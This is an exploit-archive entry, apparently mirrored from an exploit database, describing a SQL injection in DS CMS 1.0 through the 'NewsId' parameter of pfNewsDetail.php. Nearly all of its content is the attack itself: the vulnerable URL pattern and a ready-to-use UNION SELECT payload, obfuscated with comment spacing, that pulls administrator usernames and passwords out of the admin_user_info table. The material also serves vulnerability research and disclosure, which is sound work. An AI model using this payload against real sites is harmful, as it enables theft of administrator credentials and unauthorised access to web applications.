[] NeoSense

DS CMS 1.0 - 'NewsId' SQL Injection

Author: Palyo34
type: webapps
platform: php
port: 
date_added: 2009-12-31 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

 Script      : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability

 Script site : http://cms.dsinternal.com/Home

 AUTHOR      :  Palyo34

 HOME        : http://www.1923turk.biz
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://server/path/pfNewsDetail.php?NewsId=[SQL]

Example:

-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--